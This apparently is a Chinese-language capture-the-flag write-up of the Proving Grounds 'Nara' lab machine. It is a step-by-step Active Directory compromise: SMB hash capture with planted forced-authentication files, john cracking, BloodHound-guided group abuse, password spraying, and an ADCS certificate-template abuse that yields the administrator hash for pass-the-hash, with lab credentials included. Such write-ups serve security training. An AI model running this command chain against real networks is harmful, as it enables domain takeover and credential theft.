Proving Grounds Nara Writeup
Recon:
1 | nmap 192.168.159.30 -p- -Pn -sT --min-rate 2000 |
1 | nmap 192.168.159.30 -p53,88,135,139,389,445,593,3389,5985 -sC -sV -Pn |
GetShell:
目标域名为:
1 | nara.nara-security.com |
枚举共享信息:
1 | smbmap -d nara.nara-security.com -u guest -H 192.168.159.30 |
1 | smbclient //192.168.159.30/nara |
文件中是一份说明:
SMB目录会定时有人访问,采取强制认证捕获hash,使用脚本工具批量生成强制认证文件:
1 | https://raw.githubusercontent.com/dharanivarma/Pentesting-Tools/main/hashgrab.py |
放入SMB共享目录中:
捕获到hash:
使用john破解:
1 | john hash -w=/usr/share/wordlists/rockyou.txt |
使用当前凭证搜集域信息:
1 | bloodhound-python -c all -u Tracy.White -p "zqwj041FGX" -d nara-security.com -ns 192.168.228.30 |
上传bloodhound,当前用户对REMOTE ACCESS组有CenericALL权限:
REMOTE ACCESS组也只是能远程使用Powershell登录而已。将Tracy.White添加到远程登录组中:
1 | net rpc group addmem "Remote Access" "Tracy.White" -U "NARA-SECURITY.COM"/"Tracy.White"%"zqwj041FGX" -S "nara-security.com |
1 | net rpc group members "Remote Access" -U "NARA-SECURITY.COM"/"Tracy.White"%"zqwj041FGX" -S "nara-security.com" |
链接winrm:
1 | evil-winrm -i 192.168.228.30 -u Tracy.White -p "zqwj041FGX" |
执行枚举信息命令会因为权限不足而报错,在documents目录下有个加密过后的账户凭证:
使用powershell解码:
1 | # Read the password from the file and convert it to a SecureString |
使用密码进行喷洒:
1 | nxc smb 192.168.228.30 -u username -p passwd --continue-on-success |
该用户在并未发现什么攻击向量。枚举证书模板:
1 | certipy-ad find -u Jodie.Summers -p "hHO_S9gff7ehXw" -dc-ip 192.168.228.30 -vulnerable |
请求证书模板:
1 | certipy-ad req -u Jodie.Summers -p "hHO_S9gff7ehXw" -ca NARA-CA -template NaraUser -target-ip 192.168.228.30 -dc-ip 192.168.228.30 -upn administrator@nara-security.com -debug |
利用证书进行认证获取administrator的hash:
1 | certipy-ad auth -pfx administrator.pfx -domain nara-security.com -username administrator -dc-ip 192.168.228.30 |
横向移动:
1 | impacket-wmiexec nara-security.com/administrator@192.168.228.30 -hashes d35c4ae45bdd10a4e28ff529a2155745:d35c4ae45bdd10a4e28ff529a2155745 -no-pass |
All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.
wechat
alipay
Related Articles
2024-07-26
Proving Grounds Access Writeup
Recon:对端口进行扫描探测: 1nmap 192.168.203.187 -p- -Pn -n -sT --min-rate 2000 1nmap 192.168.203.187 -sC -sV -p 53,80,88,135,139,389,445,464,593,636,3268 -Pn 根据扫描结果来看,目标域名为access.offsec。 GetFlag:搜集目录信息,发现有趣的URL: 1dirsearch -u http://access.offsec/ 1234http://access.offsec/cgi-bin/printenv.plhttp://access.offsec/uploads/http://access.offsec/assets/http://access.offsec/forms/ 获取到站点绝对路径: 点击网页的Buy...
2024-12-24
Proving Grounds Clue Writeup
Proving Grounds - ClueRecon GetShell打开3000端口: 右上角是一个CQL查询的接口,页面显示版本号为3.11.13,搜索漏洞: 这个版本号不一定是Cassandra的版本号,有可能是那个集群id的版本,所以exploit DB中的文件读取poc可以尝试一下: 目标机器上存在两个用户,cassie与anthony。根据漏洞脚本的提示: 读取/proc/self/cmdline: 没什么效果。搜素8021上的服务指纹,找到一个命令注入: 但是他需要密码: 所以大概思路就是,利用文件读取漏洞却尝试读取密码,最后发现密码文件在: 对RCE利用脚本进行更改: 反弹shell: 发现3000端口才能出站。升级交互式shell: 发现用户ssh密钥: 可以用文件读取漏洞去获取: 这是root用户的密钥:
2024-07-26
Proving Grounds Slort Writeup
Recon:1nmap 192.168.196.53 -p- -Pn --min-rate 2000 -sT -n ![image-20240706195058310]https://anneballa.github.io/pageimgs/oldimage/image-20240706195058310.png) 1nmap 192.168.196.53 -p21,135,139,445,3306,4443,5040,7680,8080 -sC -sV ![image-20240706200131088]https://anneballa.github.io/pageimgs/oldimage/image-20240706200131088.png) GetFlag:枚举目录: 1dirsearch -u...
Comments
